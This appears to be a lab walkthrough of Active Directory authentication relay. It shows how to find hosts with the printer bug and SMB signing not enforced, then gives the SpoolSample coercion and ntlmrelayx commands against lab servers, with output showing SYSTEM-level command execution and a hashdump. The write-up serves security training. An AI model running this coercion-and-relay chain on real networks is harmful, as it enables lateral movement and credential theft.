General
Automated relays with machine accounts refer to a method where a machine or program is able to automatically access and control other machines or programs on the same Active Directory (AD) network using a machine account. This can be a vulnerability because it allows the machine or program to potentially access sensitive information or perform unauthorized actions on other machines or programs without the knowledge or consent of their users. Additionally, if the machine account is compromised, an attacker could use it to gain access to other machines or programs on the AD network. To mitigate this vulnerability, proper access controls and monitoring should be in place to limit the actions that machine accounts can perform, and to detect and respond to any suspicious activity.
The Printer Bug
The printer bug is a "feature" of the MS-RPRN protocol (PrintSystem Remote Protocol), which allows a domain user to remotely force a target host running the Print Spooler service to authenticate to an arbitrary IP address.
This vulnerability is related to automated relays because it allows a machine or program to remotely access and control another machine or program on the same AD network using a machine account and valid AD credentials.
-
Conditions Therefore, to exploit this, apart from machine account administrative privileges, we also need to meet the following four conditions :
-
A valid set of AD account credentials.
-
Network connectivity to the target's SMB service.
-
The target host must be running the Print Spooler service.
-
The hosts must not have SMB signing enforced.
Condition 1 and 2 have been met already. The only two we need to ensure works are conditions 3 and 4.
-
Commands
Bloodhound
Bloodhound Custome Query (find instances where a computer has the "AdminTo" relationship over another computer)
MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p
Printer Bug
Powershell (Query service (Win32_Printer) running on other machine in AD via WMI)
PS C:\> GWMI Win32_Printer -Computer MACHINE_DOMAIN
Location :
Name : Microsoft XPS Document Writer
PrinterState : 0
PrinterStatus : 3
ShareName :
SystemName : THMSERVER2
Location :
Name : Microsoft Print to PDF
PrinterState : 0
PrinterStatus : 3
ShareName :
SystemName : THMSERVER2
The output from the cmdlet verifies that the service is running. If we get an access denied error, you could perhaps attempt the PowerShell command of Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc
SMB Signing
In order to relay the coerced authentication attempt, SMB signing should not be enforced. It should be noted that there is a difference between SMB signing being allowed and SMB signing being enforced.
To verify that THMSERVER1 and THMSERVER2 do not have SMB signing enforced, we can use Nmap
nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc
Nmap scan report for distributor.za.tryhackme.loc (172.31.1.201)
Host is up (0.62s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
Nmap scan report for 172.31.1.202
Host is up (0.38s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
Nmap done: 2 IP addresses (2 hosts up) scanned in 4.59 seconds
We can see that SMB signing is enabled but not enforced based on the output. This means all our conditions are met, and we can start the attack!
Exploiting Authentication Relays
We will be using SpoolSample (opens in a new tab) to exploit the authentication relay. We will use Spoolsample.exe to coerce THMSERVER2 to authenticate to us on our machine and then Impacket (opens in a new tab)'s ntlmrelayx.py (opens in a new tab) to relay the authentication attempt THMSERVER1.
Setup NTLM relay (Attacking Machine)
python3.9 ntlmrelayx.py -smb2support -t smb://"THMSERVER1 IP" -debug
If we specify the hostname of THMSERVER1 instead of the IP, the host could request that we use Kerberos authentication instead of NTLM
SSH session over the THMSERVER1 (Already own)
C:\>SpoolSample.exe THMSERVER2.za.tryhackme.loc "Local Attacker IP"
Output from the NTLM relay
thm$ python3.9 ntlmrelayx.py -smb2support -t smb://"THMSERVER1 IP" -c 'whoami /all' -debug
[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 172.31.1.202, attacking target smb://172.31.1.201
[*] Authenticating against smb://172.31.1.201 as ZA/THMSERVER2$ SUCCEED
[+] No more targets
[*] SMBD-Thread-7: Connection from 172.31.1.202 controlled, but there are no more targets left!
[+] No more targets
[*] SMBD-Thread-8: Connection from 172.31.1.202 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] ExecuteRemote command: %COMSPEC% /Q /c echo whoami /all ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
[*] Executed specified command on host: 172.31.1.201
USER INFORMATION
User Name SID
=================== ========
nt authority\system S-1-5-18
GROUP INFORMATION
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
[...]
This output resembles what would happen if you used the -c 'whoami /all'
 command. However by specifying no command, you should now have performed a hashdump. These credentials can now be used to get a shell on the host!